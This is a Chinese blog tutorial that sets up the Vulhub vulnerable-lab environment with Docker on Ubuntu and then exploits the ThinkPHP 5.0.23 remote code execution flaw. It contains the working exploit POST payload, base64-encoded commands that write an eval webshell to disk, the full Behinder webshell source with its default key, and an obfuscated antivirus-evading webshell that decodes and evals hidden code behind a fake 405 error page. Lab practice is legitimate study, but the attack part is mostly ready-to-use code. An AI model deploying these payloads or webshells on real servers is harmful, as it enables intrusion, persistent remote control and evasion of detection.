记一次ubantu搭建vulhub靶场。从docker安装到拉取vulhub靶场一条龙服务

cen难取名2025-04-13 21:01

得而不惜就该死

-懂王

一、实验准备

1、ubantu环境:

使用阿里云服务器,如需要可以自行部署

二、实验操作

1、下载docker :

apt install docker.io

(1)出现问题

(2)解决 :apt-get update

此处由于apt-get下载命令未更新到最新状态,所以执行命令更新即可

(3)下载docker :apt install docker.io

(5)查看docker版本:docker --version

(6)docker服务设置开机自启:

systemctl start docker

systemctl enable docker

(7)安装docker-compose:

apt install docker-compose

2、使用git拉vulhub代码

php 复制代码 
# 下载根目录,先进入
cd /

# 下载最新vulhub
git clone https://github.com/vulhub/vulhub.git  

# 进入下载路径   
cd /vulhub

# 构建docker-compose
docker-compose build 

# 运行
docker-compose up -d

3、使用docker搭建vulhub靶场

(1)执行命令:docker-compose down

(2)查看已经开启的项目:docker-compose ps

(3)端口冲突

修改docker-compose.yml文件 将第一个参数修改为其他端口号即可

ports键:将本地8888端口映射到远方80端口(HTTP协议)

4、cd vulhub/thinkphp/5.0.23-rce 测试

(1)敲命令

(2)使用工具一键梭哈(冰蝎)

5、准备工作

(1)访问地址:http://blog.yuichan.cn:8888/index.php?s=captcha

(2)post packet(修改处):_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

(3)传入后门:

第一种:

IDw/cGhwIGV2YWwoJF9QT1NUW2NtZF0pOyA/PiA=

<?php eval($_POST[cmd]); ?>

第二种:

<?php eval($_POST['cmd']);?>

PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTvCoD8+

此处使用第一种

编码后:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n IDw/cGhwIGV2YWwoJF9QT1NUW2NtZF0pOyA/PiA= | base64 -d > shell.php

未编码前:

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n <?php eval($_POST['cmd']); ?> > shell1.php

5、使用工具梭哈:冰蝎

默认key:rebeyond

key加密后:e45e329feb5d925ba3f549b17b4b3dde

MD5 在线加密工具 | 菜鸟工具

后门webshell:

php 复制代码 
<?php
@error_reporting(0);
session_start();
    $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond
    $_SESSION['k']=$key;
    session_write_close();
    $post=file_get_contents("php://input");
    if(!extension_loaded('openssl'))
    {
        $t="base64_"."decode";
        $post=$t($post."");
        
        for($i=0;$i<strlen($post);$i++) {
                 $post[$i] = $post[$i]^$key[$i+1&15]; 
                }
    }
    else
    {
        $post=openssl_decrypt($post, "AES128", $key);
    }
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
    class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

免杀后

php 复制代码 
<?php
$username = 'xQPJVob1';
$password = 'UxQPJVob1UdxQPJVob1WxQPJVob1eWNtOXlYM0psY0xQPJVob1c5eWRHbHVaeWd3S1RzS2MyVnpjMmx2Ymw5emRHRnlkQ2dwT3dvZ0lDQWdKR3RsZVxQPJVob1QwaVpUUTFaVE15T1dabFlqVmtPVEkxWWlJN0lDOHY2SytsNWErRzZaS2w1TGk2NkwrZTVvNmw1YStHNTZDQk16TGt2WTF0WkRYbGdMem5tb1RsaVkweE51UzlqZSs4ak9tN21PaXVwT2kvbnVhT3BlV3ZodWVnZ1hKbFltVjViMjVrQ2dra1gxTkZVMU5KVDA1Ykoyc25YVDBrYTJWNU93b0pjMlZ6YzJsdmJsOTNjbWwwWlY5amJHOXpaU2dwT3dvSkpIQnZjM1E5Wm1sc1pWOW5aWFJmWTI5dWRHVnVkSE1vSW5Cb2NExQPJVob1b3ZMMmx1Y0hWMElpazdDZ2xwWmlnaFpYaDBaVzV6YVc5dVgyeHZZV1JsWkNnbmIzQmxibk56YkNjcEtRb0pld2xQPJVob19KQ1NSMFBTSmlZWE5sTmpSZklpNGlaR1ZqYjJSbElqc0tDUWtrY0c5emREMGtkQ2drY0c5emRDNGlJaWs3Q2drSkNna0pabTl5S0NScFBUQTdKR2s4YzNSeWJHVnVLQ1J3YjNOMEtUc2thU3NyS1NCN0NpQWdJQ0FKQ1FrZ0pIQnZjM1JiSkdsZElEMGdKSEJ2YzNSYkpHbGRYaVJyWlhsYkpHa3JNU1l4TlYwN0lBb2dJQ0FnQ1FrSmZRb0pmUW9KWld4elpRb0pld29KQ1NSd2IzTjBQVzl3Wlc1emMyeGZaR1ZqY25sd2RDZ2tjRzl6ZEN3Z0lrRkZVekV5T0NJc0lDUnJaWGtwT3dvSmZRb2dJQ0FnSkdGeWNqMWxlSEJzYjJSbEtDZDhKeXdrY0c5emRDazdDaUFnSUNBa1puVnVZejBrWVhKeVd6QmRPd29nSUNBZ0pIQmhjbUZ0Y3owa1lYSnlXekZkT3dvSlkyeGhjM01nUTN0d2RXSnNhV01nWm5WdVkzUnBiMjRnWDE5cGJuWnZhMlVvSkhBcElIdGxkbUZzS0NSd0xpSWlLVHQ5ZlFvZ0lDQWdRR05oYkd4ZmRYTmxjbDltZFc1aktHNWxkeUJES0Nrc0pIQmhjbUZ0Y3lrNw==';
header('dddddd:'.$username);
$arr = apache_response_headers();
$template_source='';
foreach ($arr as $k => $v) {
    if ($k[0] == 'd' && $k[4] == 'd') {
        $template_source = str_replace($v,'',$password);
    }
}
$template_source = base64_decode($template_source);
$template_source = base64_decode($template_source);
$key = 'template_source';
$aes_decode=$$key;
@eval($aes_decode);
$fTs3ge = "PCFET0NUWVBFIGh0bWw+CjxodG1sIGxhbmc9InpoLWNuIj4KCjxoZWFkPgogICAgPG1ldGEgY2hhcnNldD0idXRmLTgiPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlLGNocm9tZT0xIj4KICAgIDxtZXRhIG5hbWU9ImRhdGEtc3BtIiBjb250ZW50PSJhM2MwZSIgLz4KICAgIDx0aXRsZT4KICAgICAgICA0MDUKICAgIDwvdGl0bGU+CiAgICA8c2NyaXB0IHNyYz0iLy9nLmFsaWNkbi5jb20vY29kZS9saWIvcXJjb2RlanMvMS4wLjAvcXJjb2RlLm1pbi5qcyI+PC9zY3JpcHQ+CiAgICA8c3R5bGU+CiAgICAgICAgaHRtbCwKICAgICAgICBib2R5LAogICAgICAgIGRpdiwKICAgICAgICBhLAogICAgICAgIGgyLAogICAgICAgIHAgewogICAgICAgICAgICBtYXJnaW46IDA7CiAgICAgICAgICAgIHBhZGRpbmc6IDA7CiAgICAgICAgICAgIGZvbnQtZmFtaWx5OiDlvq7ova/pm4Xpu5E7CiAgICAgICAgfQoKICAgICAgICBhIHsKICAgICAgICAgICAgdGV4dC1kZWNvcmF0aW9uOiBub25lOwogICAgICAgICAgICBjb2xvcjogIzNiNmVhMzsKICAgICAgICB9CgogICAgICAgIC5jb250YWluZXIgewogICAgICAgICAgICB3aWR0aDogMTAwMHB4OwogICAgICAgICAgICBtYXJnaW46IGF1dG87CiAgICAgICAgICAgIGNvbG9yOiAjNjk2OTY5OwogICAgICAgIH0KCiAgICAgICAgLmhlYWRlciB7CiAgICAgICAgICAgIHBhZGRpbmc6IDUwcHggMDsKICAgICAgICB9CgogICAgICAgIC5oZWFkZXIgLm1lc3NhZ2UgewogICAgICAgICAgICBoZWlnaHQ6IDM2cHg7CiAgICAgICAgICAgIHBhZGRpbmctbGVmdDogMTIwcHg7CiAgICAgICAgICAgIGJhY2tncm91bmQ6IHVybChodHRwczovL2Vycm9ycy5hbGl5dW4uY29tL2ltYWdlcy9UQjFUcGFtSHBYWFhYYUpYWFhYZUI3bllWWFgtMTA0LTE2Mi5wbmcpIG5vLXJlcGVhdCAwIC0xMjhweDsKICAgICAgICAgICAgbGluZS1oZWlnaHQ6IDM2cHg7CiAgICAgICAgfQoKICAgICAgICAubWFpbiB7CiAgICAgICAgICAgIHBhZGRpbmc6IDUwcHggMDsKICAgICAgICAgICAgYmFja2dyb3VuZDoKICAgICAgICAgICAgICAgICNmNGY1Zjc7CiAgICAgICAgfQoKICAgICAgICAubWFpbiBpbWcgewogICAgICAgICAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICAgICAgICAgIGxlZnQ6IDEyMHB4OwogICAgICAgIH0KCiAgICAgICAgLmZvb3RlciB7CiAgICAgICAgICAgIG1hcmdpbi10b3A6CiAgICAgICAgICAgICAgICAzMHB4OwogICAgICAgICAgICB0ZXh0LWFsaWduOiByaWdodDsKICAgICAgICB9CgogICAgICAgIC5mb290ZXIgYSB7CiAgICAgICAgICAgIHBhZGRpbmc6IDhweCAzMHB4OwogICAgICAgICAgICBib3JkZXItcmFkaXVzOgogICAgICAgICAgICAgICAgMTBweDsKICAgICAgICAgICAgYm9yZGVyOiAxcHggc29saWQgIzRiYWJlYzsKICAgICAgICB9CgogICAgICAgIC5mb290ZXIgYTpob3ZlciB7CiAgICAgICAgICAgIG9wYWNpdHk6IC44OwogICAgICAgIH0KCiAgICAgICAgLmFsZXJ0LXNoYWRvdyB7CiAgICAgICAgICAgIGRpc3BsYXk6IG5vbmU7CiAgICAgICAgICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsKICAgICAgICAgICAgdG9wOiAwOwogICAgICAgICAgICBsZWZ0OiAwOwogICAgICAgICAgICB3aWR0aDogMTAwJTsKICAgICAgICAgICAgaGVpZ2h0OgogICAgICAgICAgICAgICAgMTAwJTsKICAgICAgICAgICAgYmFja2dyb3VuZDogIzk5OTsKICAgICAgICAgICAgb3BhY2l0eTogLjU7CiAgICAgICAgfQoKICAgICAgICAuYWxlcnQgewogICAgICAgICAgICBkaXNwbGF5OiBub25lOwogICAgICAgICAgICBwb3NpdGlvbjoKICAgICAgICAgICAgICAgIGFic29sdXRlOwogICAgICAgICAgICB0b3A6IDIwMHB4OwogICAgICAgICAgICBsZWZ0OiA1MCU7CiAgICAgICAgICAgIHdpZHRoOiA2MDBweDsKICAgICAgICAgICAgbWFyZ2luLWxlZnQ6IC0zMDBweDsKICAgICAgICAgICAgcGFkZGluZy1ib3R0b206CiAgICAgICAgICAgICAgICAyNXB4OwogICAgICAgICAgICBib3JkZXI6IDFweCBzb2xpZCAjZGRkOwogICAgICAgICAgICBib3gtc2hhZG93OiAwIDJweCAycHggMXB4IHJnYmEoMCwgMCwgMCwgLjEpOwogICAgICAgICAgICBiYWNrZ3JvdW5kOiAjZmZmOwogICAgICAgICAgICBmb250LXNpemU6IDE0cHg7CiAgICAgICAgICAgIGNvbG9yOiAjNjk2OTY5OwogICAgICAgIH0KCiAgICAgICAgLmFsZXJ0IGgyIHsKICAgICAgICAgICAgbWFyZ2luOgogICAgICAgICAgICAgICAgMCAycHg7CiAgICAgICAgICAgIHBhZGRpbmc6IDEwcHggMTVweCA1cHggMTVweDsKICAgICAgICAgICAgZm9udC1zaXplOiAxNHB4OwogICAgICAgICAgICBmb250LXdlaWdodDogbm9ybWFsOwogICAgICAgICAgICBib3JkZXItYm90dG9tOiAxcHggc29saWQgI2RkZDsKICAgICAgICB9CgogICAgICAgIC5hbGVydCBhIHsKICAgICAgICAgICAgZGlzcGxheTogYmxvY2s7CiAgICAgICAgICAgIHBvc2l0aW9uOiBhYnNvbHV0ZTsKICAgICAgICAgICAgcmlnaHQ6IDEwcHg7CiAgICAgICAgICAgIHRvcDogOHB4OwogICAgICAgICAgICB3aWR0aDogMzBweDsKICAgICAgICAgICAgaGVpZ2h0OiAyMHB4OwogICAgICAgICAgICB0ZXh0LWFsaWduOiBjZW50ZXI7CiAgICAgICAgfQoKICAgICAgICAuYWxlcnQgcCB7CiAgICAgICAgICAgIHBhZGRpbmc6IDIwcHggMTVweDsKICAgICAgICB9CgogICAgICAgICNmZWVkYmFjay1jb250YWluZXIgewogICAgICAgICAgICB3aWR0aDogMTEwcHg7CiAgICAgICAgICAgIG1hcmdpbjogYXV0bzsKICAgICAgICAgICAgbWFyZ2luLXRvcDogMTIwcHg7CiAgICAgICAgICAgIHRleHQtYWxpZ246IGNlbnRlcjsKICAgICAgICB9CgogICAgICAgICNxcmNvZGUgewogICAgICAgICAgICBtYXJnaW46IDAgMTVweCA1cHggMTVweDsKICAgICAgICB9CgogICAgICAgICNmZWVkYmFjayBhIHsKICAgICAgICAgICAgY29sb3I6ICM5OTk7CiAgICAgICAgICAgIGZvbnQtc2l6ZTogMTJweDsKICAgICAgICAgICAgbWFyZ2luLXRvcDogNXB4OwogICAgICAgIH0KICAgIDwvc3R5bGU+CjwvaGVhZD4KCjxib2R5IGRhdGEtc3BtPSI3NjYzMzU0Ij4KICAgIDxzY3JpcHQ+CiAgICAgICAgd2l0aCAoZG9jdW1lbnQpIHdpdGggKGJvZHkpIHdpdGggKGluc2VydEJlZm9yZShjcmVhdGVFbGVtZW50KCJzY3JpcHQiKSwgZmlyc3RDaGlsZCkpIHNldEF0dHJpYnV0ZSgiZXhwYXJhbXMiLCAiY2F0ZWdvcnk9JnVzZXJpZD02ODUzMDgyOTUmYXBsdXMmdWRwaWQ9VldlVU9jZVFKZEtqJiZ5dW5pZD0mZTkzYjRlM2U3NWUwNSZ0cmlkPTY1MjViNzk2MTU4MzkyMDYwOTQwMDM5MzhlJmFzaWQ9QVlmNTJDamh0V2hlK2FmK0hRQUFBQUNXQS9TSW5PM1FMdz09IiwgaWQgPSAidGItYmVhY29uLWFwbHVzIiwgc3JjID0gKGxvY2F0aW9uID4gImh0dHBzIiA/ICIvL2ciIDogIi8vZyIpICsgIi5hbGljZG4uY29tL2FsaWxvZy9tbG9nL2FwbHVzX3YyLmpzIikKICAgIDwvc2NyaXB0PgogICAgPHNjcmlwdD4KICAgICAgICAvLwogICAgICAgIHZhciBpMThuT2JqZWN0ID0gewogICAgICAgICAgICAiemgtY24iOiB7CiAgICAgICAgICAgICAgICAibWVzc2FnZSI6ICLlvojmirHmrYnvvIznlLHkuo7mgqjorr/pl67nmoRVUkzmnInlj6/og73lr7nnvZHnq5npgKDmiJDlronlhajlqIHog4HvvIzmgqjnmoTorr/pl67ooqvpmLvmlq3jgIIiLAogICAgICAgICAgICAgICAgImJnSW1nIjogImh0dHBzOi8vZXJyb3JzLmFsaXl1bi5jb20vaW1hZ2VzL1RCMTVRR2FIcFhYWFhYT2FYWFhYaWEzOVhYWC02NjAtMTE3LnBuZyIsCiAgICAgICAgICAgICAgICAicmVwb3J0IjogIuivr+aKpeWPjemmiCIsCiAgICAgICAgICAgIH0sCiAgICAgICAgICAgICJlbi11cyI6IHsKICAgICAgICAgICAgICAgICJtZXNzYWdlIjogIlNvcnJ5LCB3ZSBoYXZlIGRldGVjdGVkIG1hbGljaW91cyB0cmFmZmljIGZyb20geW91ciBuZXR3b3JrLCBwbGVhc2UgdHJ5IGFnYWluIGxhdGVyLiIsCiAgICAgICAgICAgICAgICAiYmdJbWciOiAiaHR0cHM6Ly9pbWcuYWxpY2RuLmNvbS90ZnMvVEIxQURBT0lGenFLMVJqU1pTZ1hYY3BBVlhhLTEzMjAtMjM0LmpwZyIsCiAgICAgICAgICAgICAgICAicmVwb3J0IjogIlJlcG9ydCIsCiAgICAgICAgICAgIH0KICAgICAgICB9CiAgICAgICAgdmFyIGkxOG4gPSBpMThuT2JqZWN0WyJlbi11cyJdOwogICAgICAgIGlmIChuYXZpZ2F0b3IubGFuZ3VhZ2UuaW5kZXhPZigiemgiKSA+PSAwKSB7CiAgICAgICAgICAgIGkxOG4gPSBpMThuT2JqZWN0WyJ6aC1jbiJdOwogICAgICAgIH0KCiAgICA8L3NjcmlwdD4KCiAgICA8ZGl2IGRhdGEtc3BtPSIxOTk4NDEwNTM4Ij4KICAgICAgICA8ZGl2IGNsYXNzPSJoZWFkZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPGRpdiBjbGFzcz0ibWVzc2FnZSI+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD5kb2N1bWVudC53cml0ZShpMThuLm1lc3NhZ2UpPC9zY3JpcHQ+CiAgICAgICAgICAgICAgICA8L2Rpdj4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICAgICAgPGRpdiBjbGFzcz0ibWFpbiI+CiAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICA8c2NyaXB0PmRvY3VtZW50LndyaXRlKCc8aW1nIHdpZHRoPSI2NjAiIGhlaWdodD0iMTE3IiBzcmM9IicgKyBpMThuLmJnSW1nICsgJyIvPicpPC9zY3JpcHQ+CgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Rpdj4KICAgICAgICA8ZGl2IGNsYXNzPSJmb290ZXIiPgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPHNwYW4gc3R5bGU9J2Rpc3BsYXk6bm9uZSc+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD4KICAgICAgICAgICAgICAgICAgICAgICAgZnVuY3Rpb24gZ2V0UXVlcnlTdHJpbmcodXJsLCBuYW1lKSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YXIgcmVnID0gbmV3IFJlZ0V4cCgnKF58JiknICsgbmFtZSArICc9KFteJl0qKSgmfCQpJyk7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICB2YXIgciA9IHVybC5zdWJzdHIoMSkubWF0Y2gocmVnKTsKICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlmIChyICE9PSBudWxsKSByZXR1cm4gdW5lc2NhcGUoclsyXSk7IHJldHVybiBudWxsOwogICAgICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgICAgICAgIHZhciBfX3V1aWRfX18gPSBnZXRRdWVyeVN0cmluZyhsb2NhdGlvbi5ocmVmLCAidXVpZCIpCiAgICAgICAgICAgICAgICAgICAgPC9zY3JpcHQ+CiAgICAgICAgICAgICAgICA8L3NwYW4+CiAgICAgICAgICAgICAgICA8YSB0YXJnZXQ9Il9ibGFuayIgaWQ9InJlcG9ydCIgaHJlZj0iamF2YXNjcmlwdDo7IiBkYXRhLXNwbS1jbGljaz0iZ29zdHI9L3dhZi4xMjMuMTIzO2xvY2FpZD1kMDAxOyI+CiAgICAgICAgICAgICAgICAgICAgPHNjcmlwdD5kb2N1bWVudC53cml0ZShpMThuLnJlcG9ydCk8L3NjcmlwdD4KICAgICAgICAgICAgICAgIDwvYT4KICAgICAgICAgICAgPC9kaXY+CiAgICAgICAgPC9kaXY+CiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9ImFsZXJ0U2hhZG93IiBjbGFzcz0iYWxlcnQtc2hhZG93Ij4KICAgIDwvZGl2PgogICAgPGRpdiBpZD0iYWxlcnRDb250YWluZXIiIGNsYXNzPSJhbGVydCI+CiAgICAgICAgPGgyPgogICAgICAgICAgICDmj5DnpLrvvJoKICAgICAgICAgICAgPGEgaHJlZj0iamF2YXNjcmlwdDo7IiB0aXRsZT0i5YWz6ZetIiBpZD0iY2xvc2VBbGVydCI+CiAgICAgICAgICAgICAgICBYCiAgICAgICAgICAgIDwvYT4KICAgICAgICA8L2gyPgogICAgICAgIDxwPgogICAgICAgICAgICDmhJ/osKLmgqjnmoTlj43ppojvvIzlupTnlKjpmLLngavlopnkvJrlsL3lv6vov5vooYzliIbmnpDlkoznoa7orqTjgIIKICAgICAgICA8L3A+CiAgICA8L2Rpdj4KICAgIDxkaXYgaWQ9ImZlZWRiYWNrLWNvbnRhaW5lciI+CiAgICAgICAgPGRpdiBpZD0icXJjb2RlIj48L2Rpdj4KICAgICAgICA8ZGl2IGlkPSJmZWVkYmFjayI+PC9kaXY+CiAgICA8L2Rpdj4KICAgIDxzY3JpcHQ+CiAgICAgICAgZnVuY3Rpb24gc2hvdygpIHsKICAgICAgICAgICAgdmFyIGcgPSBmdW5jdGlvbiAoZWxlKSB7CiAgICAgICAgICAgICAgICByZXR1cm4gZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoZWxlKTsKICAgICAgICAgICAgfTsKICAgICAgICAgICAgdmFyIHJlcG9ydEhhbmRsZSA9IGcoJ3JlcG9ydCcpOwogICAgICAgICAgICB2YXIgYWxlcnRTaGFkb3cgPSBnKCdhbGVydFNoYWRvdycpOwogICAgICAgICAgICB2YXIgYWxlcnRDb250YWluZXIgPSBnKCdhbGVydENvbnRhaW5lcicpOwogICAgICAgICAgICB2YXIgY2xvc2VBbGVydCA9IGcoJ2Nsb3NlQWxlcnQnKTsKICAgICAgICAgICAgdmFyIG93biA9IHt9OwogICAgICAgICAgICBvd24ucmVwb3J0ID0gZnVuY3Rpb24gKCkgeyAKICAgICAgICAgICAgICAgIG93bi5hbGVydCgpOwogICAgICAgICAgICB9OyBvd24uYWxlcnQgPSBmdW5jdGlvbiAoKSB7IGFsZXJ0U2hhZG93LnN0eWxlLmRpc3BsYXkgPSAnYmxvY2snOyBhbGVydENvbnRhaW5lci5zdHlsZS5kaXNwbGF5ID0gJ2Jsb2NrJzsgfTsgb3duLmNsb3NlID0gZnVuY3Rpb24gKCkgeyBhbGVydFNoYWRvdy5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnOyBhbGVydENvbnRhaW5lci5zdHlsZS5kaXNwbGF5ID0gJ25vbmUnOyB9OwogICAgICAgIH07CgogICAgICAgIHZhciB1dWlkID0gbG9jYXRpb24uaHJlZi5tYXRjaCgvdXVpZD0oW14mXSspLyk7CiAgICAgICAgdXVpZCA9IHV1aWQgJiYgZW5jb2RlVVJJQ29tcG9uZW50KHV1aWRbMV0pOwogICAgICAgIHZhciB1cmxRckNvZGUgPSBsb2NhdGlvbi5ocmVmLm1hdGNoKC9xcmNvZGU9KFteJl0rKS8pOwogICAgICAgIHVybFFyQ29kZSA9IHVybFFyQ29kZSAmJiBkZWNvZGVVUklDb21wb25lbnQodXJsUXJDb2RlWzFdKTsKICAgICAgICBpZiAodXVpZCB8fCB1cmxRckNvZGUpIHsKICAgICAgICAgICAgdmFyIHFyY29kZSA9IG5ldyBRUkNvZGUoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInFyY29kZSIpLCB7CiAgICAgICAgICAgICAgICB0ZXh0OiB1cmxRckNvZGUgfHwgdXVpZCwKICAgICAgICAgICAgICAgIHdpZHRoOiA4MCwKICAgICAgICAgICAgICAgIGhlaWdodDogODAsCiAgICAgICAgICAgICAgICBjb2xvckRhcms6ICIjOTk5IiwKICAgICAgICAgICAgfSk7CiAgICAgICAgICAgIHZhciBmZWVkYmFja0xpbmsgPSBnZXRGZWVkYmFja0xpbmsoKTsKICAgICAgICAgICAgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoImZlZWRiYWNrIikuaW5uZXJIVE1MID0gZmVlZGJhY2tMaW5rOwogICAgICAgIH0KICAgICAgICBmdW5jdGlvbiBnZXRGZWVkYmFja0xpbmsoKSB7CiAgICAgICAgICAgIHZhciB1cmxPcmlnaW47CiAgICAgICAgICAgIHVybE9yaWdpbiA9IGxvY2F0aW9uLmhyZWYubWF0Y2goL29yaWdpbj0oW14mXSspLyk7CiAgICAgICAgICAgIHVybE9yaWdpbiA9IHVybE9yaWdpbiAmJiBkZWNvZGVVUklDb21wb25lbnQodXJsT3JpZ2luWzFdKS5zcGxpdCgiPyIpWzBdOwogICAgICAgICAgICBpZiAodXJsT3JpZ2luKSB7CiAgICAgICAgICAgICAgICB0cnkgewogICAgICAgICAgICAgICAgICAgIHVybE9yaWdpbiA9IG5ldyBVUkwodXJsT3JpZ2luKTsKICAgICAgICAgICAgICAgICAgICBpZiAodXJsT3JpZ2luLnByb3RvY29sICE9PSAiaHR0cHM6IiAmJiB1cmxPcmlnaW4ucHJvdG9jb2wgIT09ICJodHRwOiIpIHsKICAgICAgICAgICAgICAgICAgICAgICAgdXJsT3JpZ2luID0gbnVsbDsKICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICB1cmxPcmlnaW4gPSB1cmxPcmlnaW4uaHJlZjsKICAgICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICB9IGNhdGNoIChlKSB7CiAgICAgICAgICAgICAgICAgICAgaWYgKHR5cGVvZiB1cmxPcmlnaW4gIT09ICJzdHJpbmciIHx8IHVybE9yaWdpbi5pbmRleE9mKCJodHRwIikgIT09IDApIHsKICAgICAgICAgICAgICAgICAgICAgICAgdXJsT3JpZ2luID0gbnVsbDsKICAgICAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgICAgICB1cmxPcmlnaW4gPSBmaWx0ZXJIdG1sKHVybE9yaWdpbik7CiAgICAgICAgICAgICAgICAgICAgfQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgICAgIHZhciBfbGFuZ3VhZ2UgPSBuYXZpZ2F0b3IuYnJvd3Nlckxhbmd1YWdlIHx8IG5hdmlnYXRvci5sYW5ndWFnZTsKICAgICAgICAgICAgdmFyIHRleHQgPSBbInpoLUNOIiwgInpoLWNuIl0uaW5jbHVkZXMoX2xhbmd1YWdlKSA/ICLngrnmiJHlj43ppoggPiIgOiAiQ2xpY2sgdG8gZmVlZGJhY2sgPiI7CiAgICAgICAgICAgIHJldHVybiAnPGEgaHJlZj0iJyArIHVybE9yaWdpbiArICcvX19fX190bWRfX19fXy9wYWdlL2ZlZWRiYWNrP3JhbmQ9UzNXeEdIQWdBdDc1NkVwem53Zk56SnEyQUZBMnFCTmxhM2o2RUlOVVM4V2U5ZGF6TV9pS0VscDhEd1ZTSFpVZXZwQzQxQng3UnppdlhJajlSblpnZGcmdXVpZD0nICsgZW5jb2RlVVJJQ29tcG9uZW50KHV1aWQpICsgJyZ0eXBlPTYiIHRhcmdldD0iX2JsYW5rIj4nICsgdGV4dCArICc8L2E+JzsKICAgICAgICB9OwogICAgICAgIGZ1bmN0aW9uIGZpbHRlckh0bWwoc3RyKSB7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC8mL2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoLz4vZywgIiIpOwogICAgICAgICAgICBzdHIgPSBzdHIucmVwbGFjZSgvPC9nLCAiIik7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC8iL2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoLycvZywgIiIpOwogICAgICAgICAgICBzdHIgPSBzdHIucmVwbGFjZSgvYC9nLCAiIik7CiAgICAgICAgICAgIHN0ciA9IHN0ci5yZXBsYWNlKC9qYXZhc2NyaXB0L2csICIiKTsKICAgICAgICAgICAgc3RyID0gc3RyLnJlcGxhY2UoL2lmcmFtZS9nLCAiIik7CiAgICAgICAgICAgIHJldHVybiBzdHI7CiAgICAgICAgfQoKICAgIDwvc2NyaXB0PgogICAgPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIGNoYXJzZXQ9InV0Zi04IiBzcmM9Imh0dHBzOi8vZXJyb3JzLmFsaXl1bi5jb20vZXJyb3IuanM/cz0xMCI+CiAgICA8L3NjcmlwdD4KPC9ib2R5PgoKPC9odG1sPg==";
if( count($_REQUEST) || file_get_contents("php://input") ){

}else{
    header('Content-Type:text/html;charset=utf-8');    http_response_code(405);
    echo base64_decode/**/($fTs3ge);
}

至此结束!

此处并没有添加相关实验结果,如果大家需要可以私信解决问题。全部无偿,尽我可能解答,共同进步!

相关推荐
老友@12 分钟前
RabbitMQ 深度解析:从基础到高级应用的全面指南
运维·分布式·rabbitmq
zuozewei21 分钟前
干货 | 高性能 Nginx 优化配置总结
运维·nginx
风为你而吹1 小时前
【玩泰山派】5、点灯,驱动led-(2)ubuntu18.04 升级python3.6到python3.7,安装pip3
linux·运维·ubuntu
越学不动啦1 小时前
七、自动化概念篇
运维·软件测试·自动化·测试
咕噜签名1 小时前
运行小程序需要选择什么配置的服务器
运维·服务器·小程序
柳如烟@1 小时前
Elasticsearch 安装与操作全攻略(含IK分词器配置)
运维·jenkins
Spring_java_gg2 小时前
组件和容器之争?|WebAssembly + Kubernetes:云原生的新组合
云原生·容器·kubernetes·wasm
dntktop2 小时前
《植物大战僵尸融合版v2.4.1》,塔防与创新融合的完美碰撞
运维·windows·游戏·电脑
SofterICer2 小时前
SGP.14 服务器上的多 CA 支持
运维·服务器·github
code@fzk3 小时前
Docker详细使用
linux·运维·docker·容器·shell
热门推荐
01我决定放弃搞 Java 了02RAG 实践- Ollama+RagFlow 部署本地知识库03DeepSeek各版本说明与优缺点分析04游戏引擎学习第217天05DeepSeek RAGFlow构建本地知识库系统06如何在WPS和Word/Excel中直接使用DeepSeek功能07汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量08从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑09本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程10ZNS SSD垃圾回收优化方案解读-1